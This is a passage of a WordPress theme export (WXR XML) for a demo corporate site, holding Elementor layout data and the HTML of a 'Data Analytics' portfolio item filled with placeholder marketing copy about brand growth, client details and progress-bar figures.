		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4b87d4ec","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"f7bb697","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1a84b099","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1b756974","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"474af26d","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"504f8cda","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1a48f134","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8c88c53","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"196761d3","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7b262c88","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7a91d778","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"50b0e82d","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5a058e3b","elType":"widget","settings":{"editor":"<p>October 02, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"662d291f","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"254317b1","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6d56a150","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"37b90133","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"9e89dbb","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"c2865c2","elType":"section","settings":[],"elements":[{"id":"9f6cae3","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b6584dd","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"17474a7","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"b6d01a2","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"e17d1e8","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"92c6cf8","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c595736","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"b0219dc","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"8f3763f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2aaad42","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"22237b0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d1ebf5b","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"cec2d27","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"1764d21","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"9ee4868","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"ce9d0e8","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"24d3f6e","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"0b4829c","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7ab986a","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"7b50ee1","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"8c63571","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"23bb03a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"ca88c8c","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"d8bdde6","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Data Analytics</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/</link>
		<pubDate>Fri, 11 Sep 2020 07:08:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=826</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>March 26, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>826</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:08:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:08:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[data-analytics]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
		<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[827]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4ff3a9c5","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"41414446","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"7cea63e4","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"17a99080","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"277d3a66","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"731b7798","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1ccb559a","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"889c447","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"27258f6a","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5c1d64ba","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"677ece23","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"427fc382","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b572066","elType":"widget","settings":{"editor":"<p>March 26, 